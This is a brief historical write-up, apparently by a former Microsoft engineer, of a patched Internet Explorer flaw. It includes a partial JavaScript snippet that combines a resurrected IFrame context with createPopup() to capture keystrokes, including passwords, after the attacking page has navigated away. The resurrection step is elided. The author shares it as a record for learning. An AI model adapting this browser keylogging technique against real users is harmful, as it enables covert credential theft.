Combining the IFrame resurrection technique with a createPopup() that attached a keypress event handler made it possible to capture all keystrokes typed anywhere in the browser, even after the attacker page had navigated away. The popup’s keypress handler stayed alive indefinitely.

// 1. Resurrect a destroyed IFrame's window context
var pWindow = ...; // cached window from destroyed IFrame

// 2. Create a popup in that context and attach a keypress listener
var spyPop = pWindow.createPopup();
spyPop.document.body.onkeypress = function() {
    capturedKeys += String.fromCharCode(event.keyCode);
};
spyPop.show(0, 0, screen.width, screen.height);
// Navigate away — the popup and its keystroke capture survive
location.replace("http://www.google.com");

The invisible full-screen popup captured every keypress that reached any document in the browser session, including passwords typed into other tabs. Because the popup belonged to a zombie context that was no longer linked to any live page, normal page teardown did not destroy it.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.